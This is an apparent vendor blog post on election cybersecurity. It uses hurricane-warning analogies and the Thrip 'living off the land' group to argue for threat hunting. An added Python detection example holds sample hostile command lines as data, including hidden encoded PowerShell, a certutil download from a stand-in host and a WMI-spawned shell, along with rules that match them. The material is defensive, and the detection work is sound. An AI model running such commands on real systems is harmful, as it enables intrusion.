“The warning lights are blinking red again.” - Director of National Intelligence Dan Coats talking about the cyber security threats facing U.S. electoral infrastructure.
Several years ago, I had the opportunity to participate in a briefing at the National Hurricane Center (NHC) where I saw firsthand their processes for predicting, tracking, and communicating warnings about hurricanes. Truly impressive. When the NHC issues warnings, emergency managers use that information to raise defenses, deploy resources, and plan for imminent threats.
Unfortunately, security professionals tasked with defending our electoral system generally don’t have similar forewarning. It’s as if they are preparing for a hurricane without knowing its trajectory, speed, or strength. Director Coats’ public statements are akin to NHC predicting a dangerous hurricane season but then not tracking the individual storms.
The other related challenge is that information about cyber attacks is almost always highly classified. State and local election officials often don’t know about inbound threats and may be unaware that they are in the midst of an ongoing incident. In other words, they could be in the eye of a hurricane and not know it. This isn’t unique to elections, however. There are important lessons to be learned from other critical infrastructure sectors.
Last month, we issued a report about a previously unknown attack group known as Thrip. Thrip is a sophisticated attacker and uses a technique we call “living off the land” – using operating system features or legitimate network administration tools to compromise victims’ networks. Simply put, they use good programs to do bad things. These types of attacks are difficult to detect, because malicious activity is disguised as normal system operations. When we discovered Thrip, they had already compromised satellite operators, telecommunications companies, and a defense contractor.
We identified this malicious activity using an advanced hunting tool we call Targeted Attack Analytics, which crawls through massive data sets looking for minute indicators of malicious activity. When we find something – like Thrip – we update our protections to stop it in the future. But attackers are always evolving, so, as was the case with Thrip, we often find them after their attack is already in process. In other words, we analyzed seemingly normal weather data – and found a previously invisible Category 5 storm that had the potential for massive damage.
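To make the two preceding paragraphs concrete, here is a small hunting routine written for this post as an added illustration; it is not code from the original article and is not Symantec’s Targeted Attack Analytics. It runs over a constructed set of process-creation events in an assumed “parent > child command line” text format, combines a handful of “living off the land” detection rules (a legitimate tool invoked in a way administrators rarely need) with a rarity check on parent/child lineages, and ranks the results. The rule names, the event format, and the sample events are all assumptions made for the example.

```python
import re
from collections import Counter

# Constructed sample events (assumed format: "parent.exe > child.exe args").
# Benign activity is repeated so that normal lineages are common and the
# handful of suspicious ones stand out as rare.
SAMPLE_EVENTS = (
    ["explorer.exe > chrome.exe"] * 12
    + ["explorer.exe > outlook.exe"] * 8
    + ["services.exe > svchost.exe -k netsvcs"] * 20
    + ["explorer.exe > winword.exe /n report.docx"] * 5
    + ["explorer.exe > cmd.exe /c dir"] * 3
    + [
        # A document spawning an encoded PowerShell command (placeholder payload).
        "winword.exe > powershell.exe -nop -w hidden -enc AAAA",
        # certutil used as a downloader rather than for certificate management.
        "cmd.exe > certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
        # A shell launched through the WMI provider host.
        "wmiprvse.exe > cmd.exe /c whoami",
        # Rare but benign: rarity alone is a weak signal.
        "explorer.exe > notepad.exe",
    ]
)

# Signature-style rules for legitimate tools used in ways typical of
# living-off-the-land activity. Names are illustrative, not a vendor's.
LOL_RULES = [
    ("powershell-encoded",
     re.compile(r"powershell\.exe.*\s-(e|enc|encodedcommand)\b", re.I)),
    ("certutil-download",
     re.compile(r"certutil\.exe.*-urlcache", re.I)),
    ("office-spawns-shell",
     re.compile(r"^(winword|excel|powerpnt)\.exe > (cmd|powershell|wscript|cscript)\.exe", re.I)),
    ("wmi-spawns-shell",
     re.compile(r"^wmiprvse\.exe > (cmd|powershell)\.exe", re.I)),
]


def parse_event(line):
    """Split an event into (parent image, child image, child command line)."""
    parent, _, rest = line.partition(" > ")
    child = rest.split(maxsplit=1)[0]
    return parent.strip(), child, rest


def match_rules(line):
    """Return the names of every rule that fires on this event, in rule order."""
    return [name for name, rx in LOL_RULES if rx.search(line)]


def rare_lineages(events, max_count=1):
    """Parent/child pairs seen at most max_count times across the data set."""
    pairs = Counter(parse_event(e)[:2] for e in events)
    return sorted(p for p, n in pairs.items() if n <= max_count)


def hunt(events, rare_threshold=1):
    """Score each distinct event by rule hits plus a rarity bonus, highest first."""
    rare = set(rare_lineages(events, rare_threshold))
    findings = []
    for line in sorted(set(events)):
        parent, child, _ = parse_event(line)
        hits = match_rules(line)
        is_rare = (parent, child) in rare
        if hits or is_rare:
            findings.append({
                "event": line,
                "rules": hits,
                "rare": is_rare,
                "score": len(hits) + (1 if is_rare else 0),
            })
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["score"], f["event"], f["rules"], "rare" if f["rare"] else "")
```

The point of combining the two signals is visible in the output: the document-spawned encoded PowerShell command scores highest because it both trips rules and is a lineage never seen elsewhere, while `notepad.exe` surfaces only through rarity and would be triaged last. In a real environment the baseline of “normal” lineages has to come from the organization’s own data, which is why this kind of hunting is something election officials must run over their own systems rather than receive as a generic feed.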
But sometimes we do see the storm coming. Last week the Minority of the Committee on House Administration released a report identifying 18 of the most vulnerable states to being hacked. This report focused on the need for paper ballots and redundant backup systems and audits, among other things. Essential elements for sure, but the adversaries also read the weather reports and are changing their tactics and targets in response. State and local election officials need to adapt as well.
One way for them to do this is by using hunting techniques similar to those that found Thrip. As noted in a recent blog, election security is about more than just the ballot box. This means that the threat surface is much broader and gives the adversaries many more targets to attack. The end result is that state and local election officials need to actively hunt the adversaries because a strictly defensive posture leaves them vulnerable. In short, they need to go and find the storm.
We are confronting a persistent and creative adversary dedicated to undermining the legitimacy of the elections process itself. The recent indictments against twelve Russian intelligence officials for hacking the 2016 elections only reinforce this notion. We need to take Director Coats’ comments to heart because even if the lights look green they may in fact be flashing red.
Originally posted on 08/01/2018